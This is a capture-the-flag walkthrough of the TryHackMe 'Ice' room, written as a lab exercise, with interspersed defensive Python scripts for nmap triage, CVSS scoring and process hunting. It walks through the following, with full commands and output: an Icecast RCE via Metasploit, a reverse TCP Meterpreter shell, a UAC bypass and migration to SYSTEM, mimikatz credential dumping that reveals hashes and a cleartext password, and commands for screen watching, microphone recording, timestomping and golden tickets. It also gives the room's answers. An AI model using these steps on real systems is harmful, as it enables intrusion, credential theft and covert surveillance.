
[TryHackMe] Ice: Walkthrough


Overview

This is a walkthrough of the TryHackMe room "Ice".

Task2

Q3.One of the more interesting ports that is open is Microsoft Remote Desktop (MSRDP). What port is this open on?

Run a port scan.

$ sudo nmap -sSVC -T4 -p- 10.10.227.80 --min-rate 5000
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
5357/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
8000/tcp  open  http         Icecast streaming media server
|_http-title: Site doesn't have a title (text/html).
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h50m46s, deviation: 3h27m51s, median: -9m14s
|_nbstat: NetBIOS name: DARK-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:32:69:6d:63:af (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Dark-PC
|   NetBIOS computer name: DARK-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-01-22T05:27:30-06:00
| smb2-time: 
|   date: 2025-01-22T11:27:31
|_  start_date: 2025-01-22T10:44:10
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required

This shows which ports are open and what is running on them.

A.3389
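As an added example that is not part of the original walkthrough, the following Python script parses the nmap report above into a port table and host-script results, then lists the findings a defender would raise from the same output: SMB1 message signing disabled, SMB2 signing optional, the Icecast service exposed on 8000, and the dynamic RPC endpoint ports reachable from outside. The input is an excerpt of the scan output copied from this page; the finding codes and the `assess` function are my own and are not nmap features.

```python
import re

# Constructed sample: an excerpt of the nmap -sSVC output shown in this
# walkthrough, copied from the page rather than taken from a live scan.
NMAP_OUTPUT = """\
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
5357/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
8000/tcp  open  http         Icecast streaming media server
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: DARK-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:32:69:6d:63:af (unknown)
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required
"""

# "PORT/PROTO  STATE  SERVICE  VERSION..." lines of the service table
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap(text):
    """Split the text report into ports, 'key: value' script results and
    bare script notes (NSE lines that have no key)."""
    ports, scripts, notes = [], {}, []
    for raw in text.splitlines():
        m = PORT_LINE.match(raw)
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2),
                          "state": m.group(3), "service": m.group(4),
                          "version": m.group(5).strip()})
            continue
        if raw.startswith("|"):                      # NSE script output
            body = raw[1:].lstrip("_").strip()
            if ": " in body or body.endswith(":"):
                key, _, value = body.partition(": ")
                scripts[key.rstrip(":")] = value.strip()
            elif body:
                notes.append(body)
    return {"ports": ports, "scripts": scripts, "notes": notes}


def assess(report):
    """Defender-side triage: return (code, detail) findings in report order."""
    findings = []
    scripts, notes = report["scripts"], report["notes"]
    if scripts.get("message_signing", "").startswith("disabled"):
        findings.append(("smb1-signing-disabled",
                         "SMB1 signing is off: require signing or retire SMB1"))
    if any(n.startswith("Message signing enabled but not required") for n in notes):
        findings.append(("smb2-signing-not-required",
                         "SMB2 signing is optional: set RequireSecuritySignature=1 on the server"))
    for p in report["ports"]:
        if p["state"] != "open":
            continue
        if "icecast" in p["version"].lower():
            findings.append(("icecast-exposed",
                             f"Icecast on {p['port']}/{p['proto']}: confirm the build is patched for CVE-2004-1561"))
        if p["service"] == "ms-wbt-server" or p["port"] == 3389:
            findings.append(("rdp-exposed",
                             f"RDP on {p['port']}/{p['proto']}: restrict by firewall and require NLA"))
    rpc = [p["port"] for p in report["ports"]
           if p["service"] == "msrpc" and p["port"] >= 49152]
    if rpc:
        findings.append(("rpc-ephemeral-ports",
                         f"{len(rpc)} dynamic RPC endpoint ports reachable: {rpc}"))
    return findings


if __name__ == "__main__":
    for code, detail in assess(parse_nmap(NMAP_OUTPUT)):
        print(f"[{code}] {detail}")
```

The parser works on any `-sV`/`-sC` text report; the checks in `assess` are where site policy belongs (for example flagging SMB1 at all, or any service the host is not meant to expose).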

Q4.What service did nmap identify as running on port 8000? (First word of this service)

Hint.If nmap doesn't show you the service name, try running the scan again possibly with the version enumeration switch on (-sV)

A.Icecast

Q5.What does Nmap identify as the hostname of the machine? (All caps for the answer)

Hint.If nmap doesn't show you the hostname, try running the scan again possibly with the default scripts switch on (-sC)

A.DARK-PC

Task3

Q1.What is the Impact Score for this vulnerability?

Hint.This type of vulnerability allows for an attacker to execute arbitrary code in an unauthenticated fashion. The name can be found listed at the 'Vulnerability Type' on https://www.cvedetails.com

Searching for an Icecast RCE vulnerability turns up CVE-2004-1561.


The Impact Score is 6.4.


A.6.4
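The 6.4 is the CVSS v2 impact subscore, Impact = 10.41 * (1 - (1-C)(1-I)(1-A)), and it only comes out to 6.4 when confidentiality, integrity and availability are all rated Partial (0.275 each). As an added example, not part of the original walkthrough, the Python below implements the v2 impact, exploitability and base-score arithmetic so the figure can be reproduced and the combination recovered from the score. The AV:N/AC:L/Au:N exploitability vector passed to `base_score` in the usage line is an assumption for illustration, not a value taken from the page.

```python
from itertools import product

# CVSS v2 metric weights from the CVSS v2 specification
IMPACT_WEIGHT = {"N": 0.0, "P": 0.275, "C": 0.660}       # None / Partial / Complete
ACCESS_VECTOR = {"L": 0.395, "A": 0.646, "N": 1.0}       # Local / Adjacent / Network
ACCESS_COMPLEXITY = {"H": 0.35, "M": 0.61, "L": 0.71}    # High / Medium / Low
AUTHENTICATION = {"M": 0.45, "S": 0.56, "N": 0.704}      # Multiple / Single / None


def _impact_raw(c, i, a):
    """Unrounded Impact = 10.41 * (1 - (1-C)(1-I)(1-A))."""
    return 10.41 * (1 - (1 - IMPACT_WEIGHT[c]) * (1 - IMPACT_WEIGHT[i]) * (1 - IMPACT_WEIGHT[a]))


def _exploitability_raw(av, ac, au):
    """Unrounded Exploitability = 20 * AV * AC * Au."""
    return 20 * ACCESS_VECTOR[av] * ACCESS_COMPLEXITY[ac] * AUTHENTICATION[au]


def impact_subscore(c, i, a):
    """Impact subscore as reported by scoring sites (one decimal)."""
    return round(_impact_raw(c, i, a), 1)


def exploitability_subscore(av, ac, au):
    return round(_exploitability_raw(av, ac, au), 1)


def base_score(av, ac, au, c, i, a):
    """Base = ((0.6*Impact) + (0.4*Exploitability) - 1.5) * f(Impact),
    with f = 0 when Impact is 0 and 1.176 otherwise; subscores are used
    unrounded, as the specification requires."""
    impact = _impact_raw(c, i, a)
    f = 0 if impact == 0 else 1.176
    return round((0.6 * impact + 0.4 * _exploitability_raw(av, ac, au) - 1.5) * f, 1)


def impact_ratings_for(score):
    """Every (C, I, A) rating triple whose impact subscore rounds to `score`."""
    return [t for t in product("NPC", repeat=3) if impact_subscore(*t) == score]


if __name__ == "__main__":
    # The page's Impact Score of 6.4 and the rating triple that produces it
    print("impact:", impact_subscore("P", "P", "P"))
    print("ratings giving 6.4:", impact_ratings_for(6.4))
    # Assumed exploitability vector (network, low complexity, no auth) for illustration
    print("base score for AV:N/AC:L/Au:N with P/P/P:", base_score("N", "L", "N", "P", "P", "P"))
```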

Q2.What is the CVE number for this vulnerability?

Hint.This CVE was disclosed in 2004. In the case that you get stuck on this question, a link to the manual version of the exploit associated with this service can be found in the final task. This link has some additional details about the CVE we're exploring here. https://www.cvedetails.com is recommended for the completion of this question.

A.CVE-2004-1561

Q4.What is the full path (starting with exploit) for the exploitation module?

Start Metasploit and search for the Icecast exploit module.

msf6 > search icecast

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/http/icecast_header  2004-09-28       great  No     Icecast Header Overwrite


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/icecast_header

A.exploit/windows/http/icecast_header

Q6.What is the only required setting which currently is blank?

Check the options that need to be set with show options.

msf6 exploit(windows/http/icecast_header) > show options

Module options (exploit/windows/http/icecast_header):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://docs.metasploit.com/docs/using
                                      -metasploit/basics/using-metasploit.html
   RPORT   8000             yes       The target port (TCP)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

A.RHOSTS

Task4

Q1.What's the name of the shell we have now?

Hint.It'll be the name displayed on the command prompt

Run the exploit and open a session.

msf6 exploit(windows/http/icecast_header) > exploit

[*] Started reverse TCP handler on 10.6.55.144:4444 
[*] Sending stage (176198 bytes) to 10.10.227.80
[*] Meterpreter session 1 opened (10.6.55.144:4444 -> 10.10.227.80:49292) at 2025-01-22 07:08:49 -0500

meterpreter >

A.meterpreter

Q2.What user was running that Icecast process?

Hint.getuid

Check the user name with getuid.

meterpreter > getuid
Server username: Dark-PC\Dark

A.Dark

Q3.What build of Windows is the system?

Hint.sysinfo

Check with sysinfo.

meterpreter > sysinfo
Computer        : DARK-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

A.7601

Q4.What is the architecture of the process we're running?

Hint.sysinfo

A.x64

Q6.What is the full path (starting with exploit/) for the first returned exploit?

Hint.The answer will include eventvwr

Run post/multi/recon/local_exploit_suggester.

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.10.227.80 - Collecting local exploits for x86/windows...
[*] 10.10.227.80 - 196 exploit checks are being tried...
[+] 10.10.227.80 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.227.80 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 10.10.227.80 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 10.10.227.80 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.227.80 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.227.80 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.227.80 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.227.80 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.227.80 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[+] 10.10.227.80 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.10.227.80 - Valid modules for session 1:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.                                                                           
 2   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   Yes                      The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
 3   exploit/windows/local/ms10_092_schelevator                     Yes                      The service is running, but could not be validated.                                                            
 4   exploit/windows/local/ms13_053_schlamperei                     Yes                      The target appears to be vulnerable.                                                                           
 5   exploit/windows/local/ms13_081_track_popup_menu                Yes                      The target appears to be vulnerable.                                                                           
 6   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.                                                                           
 7   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.                                                                           
 8   exploit/windows/local/ntusermndragover                         Yes                      The target appears to be vulnerable.                                                                           
 9   exploit/windows/local/ppr_flatten_rec                          Yes                      The target appears to be vulnerable.                                                                           
 10  exploit/windows/local/tokenmagic                               Yes                      The target appears to be vulnerable.

A.exploit/windows/local/bypassuac_eventvwr

Q10.What is the name of this option?

Background the session with CTRL+Z and select exploit/windows/local/bypassuac_eventvwr.

meterpreter > 
Background session 1? [y/N]  
msf6 exploit(windows/http/icecast_header) > use exploit/windows/local/bypassuac_eventvwr
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

Check the session number.

msf6 exploit(windows/local/bypassuac_eventvwr) > sessions

Active sessions
===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  1         meterpreter x86/windows  Dark-PC\Dark @ DARK-PC  10.6.55.144:4444 -> 10.10.227.80:49292
                                                             (10.10.227.80)
                                                            

Set the session number in the module options.

msf6 exploit(windows/local/bypassuac_eventvwr) > set SESSION 1
SESSION => 1

Also set LHOST.

msf6 exploit(windows/local/bypassuac_eventvwr) > set lhost 10.6.55.144
lhost => 10.6.55.144

A.LHOST

Q14.What permission listed allows us to take ownership of files?

Hint.This permission will be close to the bottom of those listed.

Run the exploit; a new session is opened.

msf6 exploit(windows/local/bypassuac_eventvwr) > exploit

[*] Started reverse TCP handler on 10.6.55.144:4444 
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (176198 bytes) to 10.10.227.80
[*] Meterpreter session 2 opened (10.6.55.144:4444 -> 10.10.227.80:49312) at 2025-01-22 07:27:37 -0500
[*] Cleaning up registry keys ...

meterpreter >

Check the privileges with getprivs.

meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

A.SeTakeOwnershipPrivilege

Task5

Q2.What's the name of the printer service?

Hint.Printers will spool documents.

List the processes with ps.

meterpreter > ps

Process List
============

 PID   PPID  Name             Arch  Session  User                        Path
 ---   ----  ----             ----  -------  ----                        ----
 0     0     [System Process]
 4     0     System           x64   0
 100   688   svchost.exe      x64   0        NT AUTHORITY\SYSTEM         C:\Windows\System32\svchost
                                                                         .exe
 416   4     smss.exe         x64   0        NT AUTHORITY\SYSTEM         C:\Windows\System32\smss.ex
                                                                         e
 464   688   svchost.exe      x64   0        NT AUTHORITY\SYSTEM         C:\Windows\System32\svchost
                                                                         .exe
 544   536   csrss.exe        x64   0        NT AUTHORITY\SYSTEM         C:\Windows\System32\csrss.e
                                                                         xe
 596   536   wininit.exe      x64   0        NT AUTHORITY\SYSTEM         C:\Windows\System32\wininit
                                                                         .exe
 604   584   csrss.exe        x64   1        NT AUTHORITY\SYSTEM         C:\Windows\System32\csrss.e
                                                                         xe
 652   584   winlogon.exe     x64   1        NT AUTHORITY\SYSTEM         C:\Windows\System32\winlogo
                                                                         n.exe
 688   596   services.exe     x64   0        NT AUTHORITY\SYSTEM         C:\Windows\System32\service
                                                                         s.exe
 704   596   lsass.exe        x64   0        NT AUTHORITY\SYSTEM         C:\Windows\System32\lsass.e
                                                                         xe
 712   596   lsm.exe          x64   0        NT AUTHORITY\SYSTEM         C:\Windows\System32\lsm.exe
 820   688   svchost.exe      x64   0        NT AUTHORITY\SYSTEM         C:\Windows\System32\svchost
                                                                         .exe
 888   688   svchost.exe      x64   0        NT AUTHORITY\NETWORK SERVI  C:\Windows\System32\svchost
                                             CE                          .exe
 936   688   svchost.exe      x64   0        NT AUTHORITY\LOCAL SERVICE  C:\Windows\System32\svchost
                                                                         .exe
 1008  688   vds.exe          x64   0        NT AUTHORITY\SYSTEM         C:\Windows\System32\vds.exe
 1060  688   svchost.exe      x64   0        NT AUTHORITY\LOCAL SERVICE  C:\Windows\System32\svchost
                                                                         .exe
 1144  688   svchost.exe      x64   0        NT AUTHORITY\NETWORK SERVI  C:\Windows\System32\svchost
                                             CE                          .exe
 1208  820   slui.exe         x64   1        Dark-PC\Dark                C:\Windows\System32\slui.ex
                                                                         e
 1276  688   spoolsv.exe      x64   0        NT AUTHORITY\SYSTEM         C:\Windows\System32\spoolsv
                                                                         .exe
 1320  688   svchost.exe      x64   0        NT AUTHORITY\LOCAL SERVICE  C:\Windows\System32\svchost
                                                                         .exe
 1336  820   WmiPrvSE.exe     x64   0        NT AUTHORITY\NETWORK SERVI  C:\Windows\System32\wbem\Wm
                                             CE                          iPrvSE.exe
 1440  688   taskhost.exe     x64   1        Dark-PC\Dark                C:\Windows\System32\taskhos
                                                                         t.exe
 1496  688   sppsvc.exe       x64   0        NT AUTHORITY\NETWORK SERVI  C:\Windows\System32\sppsvc.
                                             CE                          exe
 1552  100   dwm.exe          x64   1        Dark-PC\Dark                C:\Windows\System32\dwm.exe
 1588  1532  explorer.exe     x64   1        Dark-PC\Dark                C:\Windows\explorer.exe
 1632  688   amazon-ssm-agen  x64   0        NT AUTHORITY\SYSTEM         C:\Program Files\Amazon\SSM
             t.exe                                                       \amazon-ssm-agent.exe
 1716  688   LiteAgent.exe    x64   0        NT AUTHORITY\SYSTEM         C:\Program Files\Amazon\Xen
                                                                         tools\LiteAgent.exe
 1752  688   svchost.exe      x64   0        NT AUTHORITY\LOCAL SERVICE  C:\Windows\System32\svchost
                                                                         .exe
 1896  688   Ec2Config.exe    x64   0        NT AUTHORITY\SYSTEM         C:\Program Files\Amazon\Ec2
                                                                         ConfigService\Ec2Config.exe
 2092  688   svchost.exe      x64   0        NT AUTHORITY\NETWORK SERVI  C:\Windows\System32\svchost
                                             CE                          .exe
 2268  1588  Icecast2.exe     x86   1        Dark-PC\Dark                C:\Program Files (x86)\Icec
                                                                         ast2 Win32\Icecast2.exe
 2420  604   conhost.exe      x64   1        Dark-PC\Dark                C:\Windows\System32\conhost
                                                                         .exe
 2548  688   TrustedInstalle  x64   0        NT AUTHORITY\SYSTEM         C:\Windows\servicing\Truste
             r.exe                                                       dInstaller.exe
 2580  688   SearchIndexer.e  x64   0        NT AUTHORITY\SYSTEM         C:\Windows\System32\SearchI
             xe                                                          ndexer.exe
 2876  2868  powershell.exe   x86   1        Dark-PC\Dark                C:\Windows\SysWOW64\Windows
                                                                         Powershell\v1.0\powershell.
                                                                         exe

A.spoolsv.exe
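As an added example that is not part of the original walkthrough, the Python below parses the `ps` table above (meterpreter wraps long Name, User and Path values onto continuation lines, so a naive one-line-per-process split mangles them) and then runs two hunting heuristics a defender would apply to such a snapshot: a process whose parent has disappeared without being one of the Windows processes that are legitimately orphaned, and a 32-bit script host running from SysWOW64 on an x64 host. The input is an excerpt of the process list copied from this page; the `EXPECTED_ORPHANS` set, `SCRIPT_HOSTS` and the heuristics are my own choices.

```python
import re

# Constructed sample: an excerpt of the meterpreter `ps` table shown above,
# with its wrapped columns kept exactly as printed.
PS_OUTPUT = r"""
 PID   PPID  Name             Arch  Session  User                        Path
 ---   ----  ----             ----  -------  ----                        ----
 0     0     [System Process]
 4     0     System           x64   0
 100   688   svchost.exe      x64   0        NT AUTHORITY\SYSTEM         C:\Windows\System32\svchost
                                                                         .exe
 544   536   csrss.exe        x64   0        NT AUTHORITY\SYSTEM         C:\Windows\System32\csrss.e
                                                                         xe
 596   536   wininit.exe      x64   0        NT AUTHORITY\SYSTEM         C:\Windows\System32\wininit
                                                                         .exe
 688   596   services.exe     x64   0        NT AUTHORITY\SYSTEM         C:\Windows\System32\service
                                                                         s.exe
 888   688   svchost.exe      x64   0        NT AUTHORITY\NETWORK SERVI  C:\Windows\System32\svchost
                                             CE                          .exe
 1276  688   spoolsv.exe      x64   0        NT AUTHORITY\SYSTEM         C:\Windows\System32\spoolsv
                                                                         .exe
 1588  1532  explorer.exe     x64   1        Dark-PC\Dark                C:\Windows\explorer.exe
 1632  688   amazon-ssm-agen  x64   0        NT AUTHORITY\SYSTEM         C:\Program Files\Amazon\SSM
             t.exe                                                       \amazon-ssm-agent.exe
 2268  1588  Icecast2.exe     x86   1        Dark-PC\Dark                C:\Program Files (x86)\Icec
                                                                         ast2 Win32\Icecast2.exe
 2876  2868  powershell.exe   x86   1        Dark-PC\Dark                C:\Windows\SysWOW64\Windows
                                                                         Powershell\v1.0\powershell.
                                                                         exe
"""

# A cell is a run of text; cells are separated by two or more spaces, so
# single spaces inside "NT AUTHORITY\SYSTEM" or "Program Files" are kept.
FRAGMENT = re.compile(r"\S+(?: \S+)*")

# Parents of these exit normally on Windows (smss.exe and userinit.exe quit
# after spawning them), so a missing PPID is expected rather than suspicious.
EXPECTED_ORPHANS = {"csrss.exe", "wininit.exe", "winlogon.exe", "explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "cscript.exe", "wscript.exe"}


def parse_ps_table(text):
    """Rebuild one dict per process from the fixed-column, line-wrapped table."""
    lines = [l for l in text.splitlines() if l.strip()]
    header = next(l for l in lines if l.split()[0] == "PID")
    names = [m.group() for m in re.finditer(r"\S+", header)]
    starts = [m.start() for m in re.finditer(r"\S+", header)]
    rows = []
    for line in lines[lines.index(header) + 2:]:          # skip header and dashes
        placed = []
        for m in FRAGMENT.finditer(line):
            # assign each cell to the column whose start position is nearest
            idx = min(range(len(starts)), key=lambda i: abs(starts[i] - m.start()))
            placed.append((names[idx], m.group()))
        if placed and placed[0][0] == "PID":                # a new process row
            row = {n: "" for n in names}
            rows.append(row)
        else:                                               # wrapped continuation
            row = rows[-1]
        for name, frag in placed:                           # wraps split mid-token
            row[name] += frag
    return rows


def find_processes(rows, substring):
    """(PID, Name) pairs whose name contains the substring, case-insensitive."""
    return [(r["PID"], r["Name"]) for r in rows if substring.lower() in r["Name"].lower()]


def flag_processes(rows, host_arch="x64"):
    """Hunting heuristics over the parsed table; returns {pid: [reasons]}."""
    live = {r["PID"] for r in rows}
    flagged = {}
    for r in rows:
        name, reasons = r["Name"].lower(), []
        if r["PPID"] not in live and name not in EXPECTED_ORPHANS:
            reasons.append(f"parent PID {r['PPID']} is gone and {name} is not normally orphaned")
        if host_arch == "x64" and r["Arch"] == "x86" and name in SCRIPT_HOSTS \
                and "syswow64" in r["Path"].lower():
            reasons.append("32-bit script host running from SysWOW64 on a 64-bit host")
        if reasons:
            flagged[r["PID"]] = reasons
    return flagged


if __name__ == "__main__":
    rows = parse_ps_table(PS_OUTPUT)
    print("printer service:", find_processes(rows, "spool"))
    for pid, reasons in flag_processes(rows).items():
        print(pid, "->", "; ".join(reasons))
```

On this snapshot only PID 2876 is flagged, on both counts; Icecast2.exe is also 32-bit but is a normal child of explorer.exe and is not a script host, which is why the second heuristic looks at the path and name rather than the architecture alone.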

Q4.What user is listed?

Migrate into the process with the migrate command.

meterpreter > migrate -N spoolsv.exe
[*] Migrating from 2876 to 1276...
[*] Migration completed successfully.

Check the user with getuid.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

A.NT AUTHORITY\SYSTEM

Q7.Which command allows us to retrieve all credentials?

Load mimikatz (the kiwi extension).

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.

creds_all retrieves all credentials.

Kiwi Commands
=============

    Command                   Description
    -------                   -----------
    creds_all                 Retrieve all credentials (parsed)

A.creds_all

Q8.Run this command now. What is Dark's password?

Run creds_all to retrieve the credentials.

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain   LM                         NTLM                        SHA1
--------  ------   --                         ----                        ----
Dark      Dark-PC  e52cac67419a9a22ecb083690  7c4fe5eada682714a036e39378  0d082c4b4f2aeafb67fd0ea568
                   99ed302                    362bab                      a997e9d3ebc0eb

wdigest credentials
===================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
DARK-PC$  WORKGROUP  (null)
Dark      Dark-PC    Password01!

tspkg credentials
=================

Username  Domain   Password
--------  ------   --------
Dark      Dark-PC  Password01!

kerberos credentials
====================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
Dark      Dark-PC    Password01!
dark-pc$  WORKGROUP  (null)

A.Password01!

Task6

Q2.What command allows us to dump all of the password hashes stored on the system?

The hashdump command does this.

Priv: Password database Commands
================================

    Command                   Description
    -------                   -----------
    hashdump                  Dumps the contents of the SAM database

A.hashdump

Q3.What command allows us to watch the remote user's desktop in real time?

The screenshare command does this.

Stdapi: User interface Commands
===============================

    Command                   Description
    -------                   -----------
    screenshare               Watch the remote user desktop in real time

A.screenshare

Q4.How about if we wanted to record from a microphone attached to the system?

The record_mic command does this.

Stdapi: Webcam Commands
=======================

    Command                   Description
    -------                   -----------
    record_mic                Record audio from the default microphone for X seconds

A.record_mic

Q5.What command allows us to do this?

The timestomp command does this.

Priv: Timestomp Commands
========================

    Command                   Description
    -------                   -----------
    timestomp                 Manipulate file MACE attributes

A.timestomp

Q6.What command allows us to do this?

The golden_ticket_create command does this.

Kiwi Commands
=============

    Command                   Description
    -------                   -----------
    golden_ticket_create      Create a golden kerberos ticket

A.golden_ticket_create
